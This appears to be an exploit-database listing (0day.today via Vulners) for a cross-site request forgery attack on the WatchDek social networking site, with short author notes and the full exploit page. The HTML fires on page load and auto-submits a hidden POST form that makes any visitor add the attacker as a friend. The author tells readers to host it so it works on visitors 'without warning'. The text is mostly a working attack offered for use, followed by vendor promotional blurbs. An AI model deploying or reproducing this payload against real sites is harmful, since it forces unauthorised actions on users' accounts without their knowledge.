Lucene search
K

WatchDek Social Networking XSRF (Force Add attacker as Friend)

🗓️ 10 Apr 2011 00:00:00Reported by ^Xecuti0N3rType 
zdt
 zdt
🔗 0day.today👁 24 Views

WatchDek Social Networking XSRF Vulnerability (Force Add attacker as Friend) Exploi

Code
#(+) Exploit Title: WatchDek Social Networking XSRF Vulnerability (Force Add attacker as Friend)
#(+) Author   : ^Xecuti0n3r
#(+) E-mail  : xecutioner()yahoo.com
#(+) Category  : Web Apps [XSRF]
#(+) App website: watchdek.com

#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. Any person who visits the website
# will see that he has automatically added the attacked on his friend list without warning ;) 
____________________________________________________________________
____________________________________________________________________
Code:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>WatchDek Force add attacker as Friend</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">


function fireForms()
{
    var count = 9;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
    }
}
    
</script>
<H2>WatchDek Force add attacker as Friend</H2>

<form method="POST" name="form5" action="http://localhost:80/index.php?option=com_comprofiler&act=connections&task=addConnection&connectionid=293">
<input type="hidden" name="message" value="Add me up Sir"/> 
</form>

</body>
</html>

########################################################################
(+)Exploit Coded by: ^Xecuti0N3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew
########################################################################



#  0day.today [2018-02-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Apr 2011 00:00Current
7.1High risk
Vulners AI Score7.1
24